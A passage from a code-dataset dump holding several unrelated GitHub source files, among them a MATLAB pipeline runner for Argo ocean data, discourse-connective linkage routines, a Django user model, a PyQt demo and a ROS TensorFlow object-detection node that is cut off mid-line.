Henning Müller (henning.mueller@hevs.ch)\n Manfredo Atzori (manfredo.atzori@hevs.ch)\n\nCollaborators: Niccolò Marini (niccolo.marini@hevs.ch)\n Stefano Marchesin (stefano.marchesin@unipd.it)\n\n\n####################################################################################\nUse a figure generator for previewing a data set by displaying each image one by one\nalong with the annotations.\n\"\"\"\n\nfrom argparse import ArgumentParser\n\nfrom ..data.figure_generators import add_common_figure_generator_args, FigureGenerator\n\n\ndef add_viewer_args(parser: ArgumentParser) -> None:\n \"\"\"\n Add to the given parser the arguments relative to the preview options :\n * mode ('gt', 'pred' or 'both')\n * delay\n * save_preview\n\n Args:\n parser (ArgumentParser): An ArgumentParser.\n \"\"\"\n\n add_common_figure_generator_args(parser=parser)\n\n parser.add_argument(\n '--mode',\n help=\"mode: Select which information to display:\"\n \" ['gt': only the ground truth,\"\n \" 'pred': only the predictions,\"\n \" 'both': both predicted and ground truth annotations]\",\n default='both'\n )\n\n parser.add_argument(\n '--delay',\n help=\"The number of seconds after which the window is closed. 
If 0, the delay is disabled.\",\n        type=int,\n        default=100\n    )\n\n    parser.add_argument(\n        '--display-in-terminal',\n        help=\"Display the image in the terminal\",\n        action='store_true'\n    )\n\n    parser.add_argument(\n        '--save_preview',\n        help=\"Save the image previews in image files.\",\n        action='store_true'\n    )\n\n\ndef view_data_set(\n        figure_generator: FigureGenerator,\n        mode: str = 'both',\n        *,\n        save_preview: bool = False,\n        preview_folder: str = None,\n        delay: int = 0,\n        display_in_terminal: bool = False,\n        window_name: str = None\n) -> None:\n    \"\"\"\n    Preview all the figures from a data set.\n    The image is displayed along with the bounding boxes (panels and, if present, labels).\n\n    Args:\n        figure_generator (FigureGenerator): A generator of Figure objects.\n        mode (str): Select which information to display:\n            * 'gt': only the ground truth\n            * 'pred': only the predictions\n            * 'both': both predicted and ground truth annotations.\n        save_preview (bool): If True, saves the preview as an image.\n        preview_folder (str): The path to the folder where to store the preview images.\n        delay (int): The number of seconds after which the window is closed.\n            If 0, the delay is disabled.\n        display_in_terminal (bool): If True, also display the image in the terminal.\n        window_name (str): Name of the image display window.\n    \"\"\"\n\n    for figure in figure_generator():\n\n        figure.show_preview(mode=mode,\n                            delay=delay,\n                            display_in_terminal=display_in_terminal,\n                            window_name=window_name)\n\n        if save_preview:\n            figure.save_preview(folder=preview_folder)\n","repo_name":"GaetanLepage/compound-figure-separator","sub_path":"compfigsep/data/figure_viewer.py","file_name":"figure_viewer.py","file_ext":"py","file_size_in_byte":3776,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
{"seq_id":"15029806045","text":"# Import libraries needed for the program to run\nfrom datetime import datetime  # Standard-library class for date and time values\nimport os  # module used to build filesystem paths portably across operating systems\nimport subprocess  # module that runs new applications or programs by creating new processes\nimport sys  # module that gives us information about constants, functions, and methods of the interpreter\nimport echo\n\n# Import additional specific functions written by Donata in file tools.py\nfrom tools import replace\nfrom itertools import product\n\n# Import specific functions written by Donata in file TC_and_TS_define_param.py\nfrom TC_and_TS_define_param import (\n    year_pairs,  # Returns ((2007, 2008), (2009, 2010))\n    year_start_TC,year_end_TC,  # Start: 2007 End: 2010\n    matlab_path,  # matlab directory\n    grid_lower,grid_upper,grid_stride,  # lower: 10, upper: 210, stride: 100\n    window_size,min_num_obs,  # Returns 8, 20\n    var2use,center_month,OB,  # Temperature, 9, Oceanic basins\n    windowSizeGP,n_parpool,  # 5, 1\n    depth_layers,  # 3\n    folder2use,\n    case2use,\n    )\n\n# List of MATLAB programs to run\nlist2run = str(sys.argv)  # ['A05', 'A06','A07','A08','A09','A10','A11','A12'] #['A01', 'A02', 'A03', 'A04'] #\n\n# Define a function that runs, from within Python, a script written in the MATLAB language\ndef matlab_run(script: str, replacement_dict: dict = {}):\n    timestamp = datetime.now()\n    f_out = f\"temp_matlab_{datetime.now().strftime('%Y%m%d_%H%M%S')}.m\"\n    replace(script, f_out, replacement_dict)\n    proc=subprocess.run([\n        matlab_path,\n        '-nodisplay',\n        '-nosplash',\n        '-nodesktop',\n        f'-r \"run(\\'{f_out}\\');exit;\"'\n    ])\n    if proc.returncode != 0:\n        raise RuntimeError(f'Subprocess 
{f_out} exited with non-zero return '\n 'status.')\n # cleanup\n os.remove(f_out)\n return\n\n## A01: gridding, saves (temperature) observations from Argo profiles on 3 different pressure depths\nif ('A01' in list2run):\n print('>>>>>>>>>>>>>>>>>>>>>>>>A01')\n if case2use == 'ML':\n YEARS_LIST = year_pairs\n for YEARS in YEARS_LIST:\n matlab_run('A01_MixedLayer.m', {\n '<PY:YEARS>': f'{YEARS[0]}_{YEARS[1]}',\n '<PY:DATA_LOC>': '../Inputs/',\n '<PY:GRID_LOWER>': grid_lower,\n '<PY:GRID_UPPER>': grid_upper,\n '<PY:GRID_STRIDE>': grid_stride,\n '<PY:VAR2USE>': var2use,\n '<PY:FOLDER2USE>': folder2use,\n }) \n else: \n YEARS_LIST = year_pairs\n for YEARS in YEARS_LIST:\n matlab_run('A01_pchipGridding.m', {\n '<PY:YEARS>': f'{YEARS[0]}_{YEARS[1]}',\n '<PY:DATA_LOC>': '../Inputs/',\n '<PY:GRID_LOWER>': grid_lower,\n '<PY:GRID_UPPER>': grid_upper,\n '<PY:GRID_STRIDE>': grid_stride,\n '<PY:VAR2USE>': var2use,\n '<PY:FOLDER2USE>': folder2use,\n })\n\n## A02: concatenates arrays\nif ('A02' in list2run):\n print('>>>>>>>>>>>>>>>>>>>>>>>>A02')\n\n matlab_run('A02_concatenateArrays.m', {\n '<PY:YEARS>': f'{year_pairs}',\n '<PY:VAR2USE>': var2use,\n '<PY:FOLDER2USE>': folder2use, \n })\n\n## A03: creates data mask\nif ('A03' in list2run):\n print('>>>>>>>>>>>>>>>>>>>>>>>>A03')\n\n matlab_run('A03_createDataMask.m', {\n '<PY:WINDOW_SIZE>': window_size,\n '<PY:MIN_NUM_OBS>': min_num_obs,\n '<PY:VAR2USE>': var2use,\n '<PY:FOLDER2USE>': folder2use, \n '<PY:START_YEAR>': f'{year_start_TC}',\n '<PY:END_YEAR>': f'{year_end_TC}',\n })\n\n## A04: filters using masks\nif ('A04' in list2run):\n print('>>>>>>>>>>>>>>>>>>>>>>>>A04')\n\n matlab_run('A04_filterUsingMasks.m', {\n '<PY:WINDOW_SIZE>': window_size,\n '<PY:MIN_NUM_OBS>': min_num_obs,\n '<PY:VAR2USE>': var2use,\n '<PY:FOLDER2USE>': folder2use, \n })\n\n## A05: divides profile in two groups:\nif ('A05' in list2run):\n print('>>>>>>>>>>>>>>>>>>>>>>>>A05')\n\n ## A05: Hurricane profiles\n matlab_run('A05_splitHurricaneProfiles.m', {\n '<PY:GRID_VAR_FN>': folder2use + '/Outputs/gridArgoProfHurricane_',\n '<PY:MASK_VALUE>': '0',\n '<PY:MASK_NAME>': 'NoHurMask.csv',\n '<PY:WINDOW_SIZE>': window_size,\n '<PY:MIN_NUM_OBS>': min_num_obs,\n '<PY:VAR2USE>': var2use,\n '<PY:FOLDER2USE>': folder2use, \n })\n\n ## A05: Non-hurricane profiles\n matlab_run('A05_splitHurricaneProfiles.m', {\n '<PY:GRID_VAR_FN>': folder2use + '/Outputs/gridArgoProfNonHurricane_',\n '<PY:MASK_VALUE>': '1',\n '<PY:MASK_NAME>': 'NoHurMask.csv',\n '<PY:WINDOW_SIZE>': window_size,\n '<PY:MIN_NUM_OBS>': min_num_obs,\n '<PY:VAR2USE>': var2use,\n '<PY:FOLDER2USE>': folder2use, \n })\n\n## A06: estimate biases due to: temporal mean, seasonal cycle and trend (amplitude)\nif ('A06' in list2run):\n print('>>>>>>>>>>>>>>>>>>>>>>>>A06')\n matlab_run('A06_estimateMeanField.m', {\n '<PY:START_YEAR>': f'{year_start_TC}',\n '<PY:END_YEAR+1>': f'{year_end_TC+1}',\n '<PY:WINDOW_SIZE>': window_size,\n '<PY:MIN_NUM_OBS>': min_num_obs,\n '<PY:VAR2USE>': var2use,\n '<PY:FOLDER2USE>': folder2use, \n })\n\n## A07: subtract mean for non-hurricanes\nif ('A07' in list2run):\n print('>>>>>>>>>>>>>>>>>>>>>>>>A07')\n matlab_run('A07_subtractMean.m', {\n '<PY:GRID_DATA_FN>': folder2use + '/Outputs/gridArgoProfFiltered_',\n '<PY:RES_DATA_FN>': folder2use + '/Outputs/gridArgoRes_',\n '<PY:WINDOW_SIZE>': window_size,\n '<PY:MIN_NUM_OBS>': min_num_obs,\n '<PY:VAR2USE>': var2use,\n '<PY:FOLDER2USE>': folder2use, \n })\n matlab_run('A07_subtractMean.m', {\n '<PY:GRID_DATA_FN>': folder2use + '/Outputs/gridArgoProfNonHurricane_',\n 
'<PY:RES_DATA_FN>': folder2use + '/Outputs/gridArgoResNonHurricane_',\n '<PY:WINDOW_SIZE>': window_size,\n '<PY:MIN_NUM_OBS>': min_num_obs,\n '<PY:VAR2USE>': var2use,\n '<PY:FOLDER2USE>': folder2use, \n })\n\n## A08: divides data in months\nif ('A08' in list2run):\n print('>>>>>>>>>>>>>>>>>>>>>>>>A08')\n matlab_run('A08_divideDataToMonths.m', {\n '<PY:START_YEAR>': f'{year_start_TC}',\n '<PY:END_YEAR>': f'{year_end_TC}',\n '<PY:WINDOW_SIZE>': window_size,\n '<PY:MIN_NUM_OBS>': min_num_obs,\n '<PY:VAR2USE>': var2use,\n '<PY:FOLDER2USE>': folder2use, \n })\n\n## A09\nif ('A09' in list2run):\n print('>>>>>>>>>>>>>>>>>>>>>>>>A09')\n matlab_run('A09_extendedData.m', {\n '<PY:START_YEAR>': f'{year_start_TC}',\n '<PY:END_YEAR>': f'{year_end_TC}',\n '<PY:WINDOW_SIZE>': window_size,\n '<PY:MIN_NUM_OBS>': min_num_obs,\n '<PY:FOLDER2USE>': folder2use, \n })\n\n## A10\nif ('A10' in list2run):\n print('>>>>>>>>>>>>>>>>>>>>>>>>A10') \n # NA\n matlab_run('A10_filterLocalMLESpaceTime.m', {\n '<PY:START_YEAR>': f'{year_start_TC}',\n '<PY:END_YEAR>': f'{year_end_TC}',\n '<PY:WINDOW_SIZE>': window_size,\n '<PY:MIN_NUM_OBS>': min_num_obs,\n '<PY:CENTER_MONTH>': center_month,\n '<PY:OCEAN_BASIN>': '_NorthAtlantic',\n '<PY:FOLDER2USE>': folder2use, \n })\n # WP\n matlab_run('A10_filterLocalMLESpaceTime.m', {\n '<PY:START_YEAR>': f'{year_start_TC}',\n '<PY:END_YEAR>': f'{year_end_TC}',\n '<PY:WINDOW_SIZE>': window_size,\n '<PY:MIN_NUM_OBS>': min_num_obs,\n '<PY:CENTER_MONTH>': center_month,\n '<PY:OCEAN_BASIN>': '_WestPacific',\n '<PY:FOLDER2USE>': folder2use, \n })\n\n## A11\nif ('A11' in list2run):\n print('>>>>>>>>>>>>>>>>>>>>>>>>A11')\n fn = folder2use + '/Outputs/localMLESpaceTime_Depth_{d:03d}_{ws}_{mno}_{wsGP}_{cm:02d}_{sy}_{ey}{ob}.mat'\n for (ob, ob_mesh), depth in product(OB, range(1, depth_layers+1)):\n if not os.path.exists(fn.format(\n d=depth*10,\n ws=window_size,\n mno=min_num_obs,\n wsGP=windowSizeGP,\n cm=int(center_month),\n sy=year_start_TC,\n ey=year_end_TC,\n ob=ob)):\n print(ob, 'layer ',depth)\n current_layer = int(grid_lower) + (depth-1)*int(grid_stride)\n matlab_run('A11_localMLESpaceTime.m', {\n '<PY:CURRENT_LAYER>' : f'{current_layer}',\n '<PY:START_YEAR>': f'{year_start_TC}',\n '<PY:END_YEAR>': f'{year_end_TC}',\n '<PY:DEPTH_INDEX>': f'{depth}',\n '<PY:WINDOW_SIZE>': window_size,\n '<PY:MIN_NUM_OBS>': min_num_obs,\n '<PY:CENTER_MONTH>': center_month,\n '<PY:N_PARPOOL>': n_parpool,\n '<PY:OCEAN_BASIN>': ob,\n '<PY:OB_MESHGRID>': ob_mesh,\n '<PY:WINDOW_SIZE_GP>': windowSizeGP,\n '<PY:FOLDER2USE>': folder2use, \n })\n \n## A12\nif ('A12' in list2run):\n print('>>>>>>>>>>>>>>>>>>>>>>>>A12')\n fn = folder2use + '/Outputs/localMLESpaceTime_Depth_{d:03d}_{ws}_{mno}_{wsGP}_{cm:02d}_{sy}_{ey}{ob}.mat'\n for (ob, ob_mesh), depth in product(OB, range(1, depth_layers+1)):\n print(ob, 'layer ', depth)\n current_layer = int(grid_lower) + (depth-1)*int(grid_stride)\n matlab_run('A12_fitLocalMLESpaceTime.m', {\n '<PY:CURRENT_LAYER>' : f'{current_layer}',\n '<PY:GRID_VAR_FN>': folder2use + '/Outputs/gridArgoProfFiltered_',\n '<PY:START_YEAR>': f'{year_start_TC}',\n '<PY:END_YEAR>': f'{year_end_TC}',\n '<PY:DEPTH_INDEX>': f'{depth}',\n '<PY:WINDOW_SIZE>': window_size,\n '<PY:MIN_NUM_OBS>': min_num_obs,\n '<PY:CENTER_MONTH>': center_month,\n '<PY:N_PARPOOL>': n_parpool,\n '<PY:OCEAN_BASIN>': ob,\n '<PY:OB_MESHGRID>': ob_mesh,\n '<PY:WINDOW_SIZE_GP>': windowSizeGP,\n '<PY:VAR2USE>': var2use,\n '<PY:FOLDER2USE>': folder2use, \n 
})\n","repo_name":"jacoposala29/ARGO_code_JS","sub_path":"Codes_pipeline/pipeline_matlab_DG.py","file_name":"pipeline_matlab_DG.py","file_ext":"py","file_size_in_byte":10275,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"41699348423","text":"\"\"\"Routines for connective annotations\"\"\"\nimport re\n\nfrom collections import defaultdict\n\n\ndef all_indices(s, target, offset=0):\n listindex = []\n i = s.find(target, offset)\n while i >= 0:\n listindex.append(i + len(target))\n i = s.find(target, i + 1)\n return listindex\n\nITEM_FORMAT = '{}[{}:{}]'\n\n\ndef extract_item(connective, tokens, it, continuous=False):\n item = []\n text = ''\n for i in range(it, len(tokens)):\n text += tokens[i]\n if connective.startswith(text):\n item.append(ITEM_FORMAT.format(i, 0, len(tokens[i])))\n if connective == text:\n return i, item\n elif not continuous:\n break\n else:\n break\n return it, None\n\n\ndef offsets_to_items(offsets, tokens, text):\n items = []\n it = 0\n it_start = 0\n for start, end in offsets:\n item = []\n\n while end > it_start:\n it_end = it_start + len(tokens[it])\n\n if start < it_end:\n item.append(ITEM_FORMAT.format(\n it,\n max(start - it_start, 0),\n min(end - it_start, len(tokens[it]))\n ))\n if end < it_end:\n break\n\n it += 1\n it_start = it_end\n\n items.append(item)\n\n return items\n\n\ndef items_to_tuple(items):\n return tuple(','.join(item) for item in items)\n\n\ndef token_indices(word):\n \"\"\"Get indices of tokens in a word of linkage\"\"\"\n return (int(i.split('[')[0]) for i in word.split(','))\n\n\ndef list_of_token_indices(words):\n return [list(token_indices(x)) for x in words]\n\n\nclass LinkageFile(object):\n\n def __init__(self, linkage_path):\n self.linkage = defaultdict(set)\n self.linkage_with_types = set()\n self.linkage_type = defaultdict(dict)\n self.linkage_type2 = defaultdict(dict)\n self.structure_type = defaultdict(dict)\n self.type_stats = defaultdict(lambda: defaultdict(int))\n self.type_stats2 = defaultdict(lambda: defaultdict(int))\n self.rtype_counts = defaultdict(int)\n self.rtype_counts2 = defaultdict(int)\n self.type_counts = defaultdict(int)\n self.type_counts_comp = defaultdict(int)\n self.len_counts = defaultdict(int)\n\n with open(linkage_path, 'r') as f:\n items = [l.rstrip().split('\\t') for l in f]\n\n for plabel, words, indices, tp, tp2, sp in items:\n tp = int(tp)\n tp2 = int(tp2)\n sp = int(sp)\n\n cnnct = tuple(indices.split('-'))\n self.linkage[plabel].add(cnnct)\n self.linkage_type[plabel][cnnct] = tp\n self.linkage_type2[plabel][cnnct] = tp2\n self.structure_type[plabel][cnnct] = sp\n self.type_stats[words][tp] += 1\n self.type_stats2[words][tp2] += 1\n self.rtype_counts[tp] += 1\n self.rtype_counts2[tp2] += 1\n self.type_counts[words] += 1\n self.len_counts[words.count('-') + 1] += 1\n for w in words.split('-'):\n self.type_counts_comp[w] += 1\n\n for plabel, words, indices, _, _, _ in items:\n cnnct = tuple(indices.split('-'))\n if len(self.type_stats[words]) > 1:\n self.linkage_with_types.add((plabel, cnnct))\n\n def internal_print_type_stats(self, type_stats):\n d = defaultdict(int)\n dinst = defaultdict(int)\n for w, s in type_stats.items():\n d[len(s)] += 1\n dinst[len(s)] += self.type_counts[w]\n\n print('Type stats')\n for v, c in sorted(d.items()):\n print('{}: {}'.format(v, c))\n\n print('Type instances stats')\n for v, c in sorted(dinst.items()):\n print('{}: {}'.format(v, c))\n\n def print_type_stats(self):\n print('\\n1-level')\n 
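# Editor's note (hedged): internal_print_type_stats buckets connectives by the number of distinct relation types they appear with, then prints connective and instance counts per bucket.\n        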
self.internal_print_type_stats(self.type_stats)\n\n print('\\n2-level')\n self.internal_print_type_stats(self.type_stats2)\n\n print('\\n1-level total')\n for i, c in sorted(self.rtype_counts.items()):\n print('{}: {}'.format(i, c))\n\n print('\\n2-level total')\n for i, c in sorted(self.rtype_counts2.items()):\n print('{}: {}'.format(i, c))\n\n def all_words(self):\n \"\"\"Get identities of all single words appeared.\"\"\"\n words = set()\n for plabel, links in self.linkage.items():\n for link in links:\n for index in link:\n words.add((plabel, index))\n\n return words\n\n def __getitem__(self, plabel):\n \"\"\"Get linkages of a paragraph.\"\"\"\n return self.linkage[plabel]\n\n\nclass LinkageDetector(object):\n\n def __init__(self, connective_path):\n \"\"\"Creates likage detector by connective token file\"\"\"\n with open(connective_path, 'r') as f:\n self.connectives = {tuple(l.rstrip().split('\\t')) for l in f}\n self.components = set()\n for connective in self.connectives:\n for component in connective:\n self.components.add(component)\n\n def perfect_tokens(self, tokens, *, truth):\n \"\"\"get all connective candidates generated by known components\"\"\"\n list_of_tokens = list(self.detect_all(tokens))\n components = set()\n for indices in truth:\n for index in indices:\n components.add(index)\n\n for words, indices in list_of_tokens:\n if all(x in components for x in indices):\n yield words, indices\n\n def all_tokens(self, tokens, *, continuous=True, cross=False):\n \"\"\"get all connective candidates matched with connective lexicon by complete tokens\"\"\"\n # return a list\n list_of_tokens = list(self.detect_by_tokens(tokens,\n continuous=continuous,\n cross=cross))\n return list_of_tokens\n\n def detect_by_tokens(self, tokens, *, continuous=True, cross=False):\n \"\"\"get all connective candidates matched with connective lexicon by complete tokens\"\"\"\n for connective in self.connectives:\n for indices in self.extract_connective(0, connective, 0, tokens,\n continuous=continuous,\n cross=cross):\n yield connective, indices\n\n def detect_all_components(self, tokens):\n \"\"\"get all component candidates matched with component lexicon\"\"\"\n for component in self.components:\n for indices in self.extract_all_connective(0,\n (component,),\n 0,\n tokens,\n ''.join(tokens)):\n yield component, indices[0]\n\n def detect_all(self, tokens):\n \"\"\"get all connective candidates matched with connective lexicon\"\"\"\n for connective in self.connectives:\n for indices in self.extract_all_connective(0, connective, 0, tokens,\n ''.join(tokens)):\n yield connective, indices\n\n def extract_connective(self, idx, connective, it, tokens, *,\n items=None, continuous=False, cross=False):\n \"\"\"\n recursively extract connective candidates matched with the connective\n by complete tokens\n\n continuous: include continuous complete tokens\n cross: the components must cross a clause boundary\n \"\"\"\n if items is None:\n items = []\n\n if idx >= len(connective):\n yield items_to_tuple(items)\n else:\n for i in range(it, len(tokens)):\n offset, item = extract_item(\n connective[idx], tokens, i, continuous)\n if item is not None:\n items.append(item)\n if cross:\n while offset < len(tokens):\n if re.search(r'\\W', tokens[offset]) is not None:\n break\n else:\n offset += 1\n yield from self.extract_connective(\n idx + 1, connective, offset + 1, tokens,\n items=items, continuous=continuous)\n items.pop()\n\n def extract_all_connective(self, idx, connective, start, tokens, text, *,\n 
offsets=None):\n \"\"\"recursively detect all connective candidates matched with the connective\"\"\"\n\n if offsets is None:\n offsets = []\n\n if idx >= len(connective):\n items = offsets_to_items(offsets, tokens, text)\n yield items_to_tuple(items)\n else:\n component = connective[idx]\n while True:\n offset = text.find(component, start)\n if offset != -1:\n end = offset + len(component)\n offsets.append((offset, end))\n yield from self.extract_all_connective(\n idx + 1, connective, end, tokens, text,\n offsets=offsets)\n offsets.pop()\n\n start = offset + 1\n else:\n break\n","repo_name":"shaform/disambig","sub_path":"linkage/linkage.py","file_name":"linkage.py","file_ext":"py","file_size_in_byte":9517,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"73098234727","text":"# ---------- Import ----------\nimport copy\nimport sys\ninput = sys.stdin.readline\n\n# ---------- Function ----------\ndef simulation(rowSize, colSize, x, y, direction, area):\n # direction : North(0), East(1), South(2), West(3)\n \n cnt = 0\n iscleaning = copy.deepcopy(area)\n \n # UP, RGT, DN, LFT\n dx = [-1, 0, 1, 0]\n dy = [0, 1, 0, -1]\n \n while True:\n if iscleaning[x][y] == 0:\n iscleaning[x][y] = 1\n cnt += 1\n \n for i in range(4):\n nx = dx[i] + x\n ny = dy[i] + y\n \n if 0<=nx<rowSize and 0<=ny<colSize and\\\n area[nx][ny] != 1 and iscleaning[nx][ny] == 0:\n direction -= 1\n if direction < 0: direction = 3\n \n if area[x + dx[direction]][y + dy[direction]] == 0 and\\\n iscleaning[x + dx[direction]][y + dy[direction]] == 0:\n x += dx[direction]\n y += dy[direction]\n \n break\n else:\n nx = x - dx[direction]\n ny = y - dy[direction]\n \n if 0 <= nx < rowSize and 0 <= ny < colSize and area[nx][ny] != 1:\n x, y = nx, ny\n else:\n return cnt\n \n# ---------- Main ----------\nrow, col = map(int, input().split())\n# d: North(0), East(1), South(2), West(3)\nfirstX, firstY, direction = map(int, input().split())\narea = [list(map(int, input().split())) for _ in range(row)]\n\nresult = simulation(row, col, firstX, firstY, direction, area)\nprint(result)\n\n# ---------- Comment ----------\n# Cleaning condition\n# 0 is not clean, 1 is clean\n\n# 1. Cleaning current area\n# 2. all direction is already clean\n# 1. keep direction, go backward and STEP 1\n# 2. if can not move backward, then Stop\n# 3. not clean area exits any dicreation\n# 1. rotate left 90\n# 2. if front area is not clean, then move forward\n# 3. 
go STEP 1","repo_name":"miny-genie/BOJ","sub_path":"acmicpc_14503.py","file_name":"acmicpc_14503.py","file_ext":"py","file_size_in_byte":1988,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"17663254129","text":"from django.db import models\nfrom django.contrib.auth.models import AbstractUser\n\nclass Usuario (AbstractUser):\n    VENDEDOR = 1\n    USUARIO = 2\n\n    ROLES = (\n        (VENDEDOR, 'Seller'),\n        (USUARIO, 'User')\n    )\n\n    username = models.CharField(\n        'username',\n        max_length=50,\n        unique=True,\n        error_messages={\n            'unique': 'A user with this username already exists.'\n        }\n    )\n\n    USERNAME_FIELD = 'username'\n\n    email = models.EmailField(\n        'email_address',\n        unique=True,\n        error_messages={\n            'unique' : 'A user with this email already exists.'\n        }\n    )\n\n    rol = models.IntegerField(choices=ROLES, default=USUARIO)\n\n    is_verified = models.BooleanField(\n        'user',\n        default=True,\n        help_text='True if the user has verified their registration.'\n    )\n\n    is_active = models.BooleanField(default=True)\n\n    is_staff = models.BooleanField(default=True)\n\n    def __str__(self):\n        return self.username\n\n    def get_short_name(self):\n        return self.username","repo_name":"RicardoWebProject/ControlBack","sub_path":"control/app/models/usuarios.py","file_name":"usuarios.py","file_ext":"py","file_size_in_byte":1126,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
{"seq_id":"11342467082","text":"from django import forms\nfrom django.forms import ModelForm\n\nfrom listArch.models import BusinessType\n\n\nclass BusinessTypeForm(ModelForm):\n    isProduct_based = forms.BooleanField(required=False)\n\n    class Meta:\n        model = BusinessType\n        fields = ('key', 'isProduct_based', )\n        widgets = {\n            'key': forms.TextInput(\n                attrs={'class': 'form-control ', 'placeholder': 'Profile Name', 'required': 'required',\n                       'name': 'key'}),\n\n        }\n","repo_name":"furkanyalcindag/oxit-listingArch","sub_path":"listArch/Forms/BusinessTypeForm.py","file_name":"BusinessTypeForm.py","file_ext":"py","file_size_in_byte":498,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"11884900095","text":"'''\nCreated on Sep 20, 2017\n\n@author: Burkhard A. 
Meier\n'''\n\nfrom Video2_MainWindow import Ui_MainWindow\n\nfrom PyQt5 import QtWidgets\n\n\ndef set_table_items():\n #### \n row = 0\n ui.tableWidget.setItem(row , 0, QtWidgets.QTableWidgetItem(\"item1\"))\n ui.tableWidget.setItem(1 , 1, QtWidgets.QTableWidgetItem(\"item2\"))\n ui.tableWidget.setItem(2 , 2, QtWidgets.QTableWidgetItem(\"item3\"))\n ###\n\nif __name__ == \"__main__\":\n import sys\n app = QtWidgets.QApplication(sys.argv)\n MainWindow = QtWidgets.QMainWindow()\n \n ui = Ui_MainWindow()\n ui.setupUi(MainWindow)\n \n # call function\n set_table_items()\n \n MainWindow.show()\n sys.exit(app.exec_())\n \n \n \n \n ","repo_name":"jantonisito/Python_GUI_Programming_Recipes_using_PyQt5","sub_path":"Section3_Enhancing_the_QT5_GUI _Functionality/Video2_Decouple_code_from_ui_2.py","file_name":"Video2_Decouple_code_from_ui_2.py","file_ext":"py","file_size_in_byte":712,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"2587593088","text":"#!/usr/bin/env python\nfrom __future__ import print_function\nimport roslib\n# roslib.load_manifest('object_detection_tensorflow')\nimport sys\nimport rospy\nimport cv2\nimport time\nfrom std_msgs.msg import String\nfrom sensor_msgs.msg import Image\nfrom cv_bridge import CvBridge, CvBridgeError\nfrom sensor_msgs.msg import CompressedImage\n\nimport numpy as np\nimport os\nimport six.moves.urllib as urllib\nimport sys\nimport tarfile\nimport tensorflow as tf\nimport zipfile\nfrom utils import ops as utils_ops\nfrom utils import label_map_util\nfrom utils import visualization_utils as vis_util\n\nfrom object_detection_tensorflow_msgs.msg import BBox, BBoxArray\n\n#Disable Tensroflow log\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'\n\nSKIP_FRAMES = 0\n\nclass ObjectDetectionTensorflow:\n def __init__(self):\n self.seq = 0\n self.ready = False\n self.counter = 0\n self.bridge = CvBridge()\n\n self.camera_topic = rospy.get_param('~camera_topic',\n \"/image_raw\")\n self.image_sub = rospy.Subscriber(self.camera_topic, Image,\n self.callback, queue_size=1)\n self.render = rospy.get_param('~render', True)\n if self.render:\n self.image_pub = rospy.Publisher(\"detections/image_raw/compressed\", CompressedImage, queue_size=5)\n self.model_name = rospy.get_param('~model_name')\n self.models_dir = rospy.get_param('~models_dir')\n self.path_to_ckpt = self.models_dir + '/' + self.model_name + '/frozen_inference_graph.pb'\n self.path_to_labels =rospy.get_param('~path_to_labels')\n self.num_classes = rospy.get_param('~num_classes', 90)\n self.threshold = rospy.get_param('~threshold', 0.5)\n self.rotate = rospy.get_param('~rotate', False)\n self.debug = rospy.get_param('~debug', False)\n self.bbox_pub = rospy.Publisher(self.camera_topic+\"/detections\", BBoxArray, queue_size=5)\n\n print(\"path_to_ckpt:\",self.path_to_ckpt)\n print(\"path_to_labels:\",self.path_to_labels)\n\n if self.path_to_ckpt == '' or self.path_to_labels == '':\n print(\"\\n\\nProvide requiered args: path_to_ckpt, path_to_labels\")\n print(\"Shutting down.\")\n exit(-1)\n\n self.label_map = label_map_util.load_labelmap(self.path_to_labels)\n self.categories = label_map_util.convert_label_map_to_categories(self.label_map,\n max_num_classes=self.num_classes, use_display_name=True)\n self.category_index = label_map_util.create_category_index(self.categories)\n\n print(\"Category map loaded:\")\n for i,n in zip (self.category_index.keys(),[str(_['name']) for _ in self.category_index.values()]):\n print(\"%4d %s\"%(i,n))\n\n self.detection_graph 
= tf.Graph()\n with self.detection_graph.as_default():\n od_graph_def = tf.GraphDef()\n print(\"Loading model\")\n\n with tf.gfile.GFile(self.path_to_ckpt, 'rb') as fid:\n serialized_graph = fid.read()\n print(\"Parsing\")\n od_graph_def.ParseFromString(serialized_graph)\n tf.import_graph_def(od_graph_def, name='')\n config = tf.ConfigProto()\n config.gpu_options.allow_growth = True\n self.sess = tf.Session(config=config, graph=self.detection_graph)\n\n # Get handles to input and output tensors\n ops = tf.get_default_graph().get_operations()\n print(\"Outputs:\")\n all_tensor_names = {output.name for op in ops for output in op.outputs}\n self.tensor_dict = {}\n for key in [\n 'num_detections', 'detection_boxes', 'detection_scores',\n 'detection_classes', 'detection_masks'\n ]:\n tensor_name = key + ':0'\n if tensor_name in all_tensor_names:\n print(\" \"+key)\n self.tensor_dict[key] = tf.get_default_graph().get_tensor_by_name(\n tensor_name)\n self.image_tensor = tf.get_default_graph().get_tensor_by_name('image_tensor:0')\n\n self.ready = True\n print(\"Model loaded. Waiting for messages on topic:\",self.camera_topic)\n\n def run_inference_for_single_image(self, image):\n with self.detection_graph.as_default():\n\n if 'detection_masks' in self.tensor_dict:\n # The following processing is only for single image\n detection_boxes = tf.squeeze(self.tensor_dict['detection_boxes'], [0])\n detection_masks = tf.squeeze(self.tensor_dict['detection_masks'], [0])\n # Reframe is required to translate mask from box coordinates to image coordinates and fit the image size.\n real_num_detection = tf.cast(self.tensor_dict['num_detections'][0], tf.int32)\n detection_boxes = tf.slice(detection_boxes, [0, 0], [real_num_detection, -1])\n detection_masks = tf.slice(detection_masks, [0, 0, 0], [real_num_detection, -1, -1])\n detection_masks_reframed = utils_ops.reframe_box_masks_to_image_masks(\n detection_masks, detection_boxes, image.shape[0], image.shape[1])\n detection_masks_reframed = tf.cast(\n tf.greater(detection_masks_reframed, 0.5), tf.uint8)\n # Follow the convention by adding back the batch dimension\n self.tensor_dict['detection_masks_reframed'] = tf.expand_dims(\n detection_masks_reframed, 0)\n # Run inference\n output_dict = self.sess.run(self.tensor_dict,\n feed_dict={self.image_tensor: 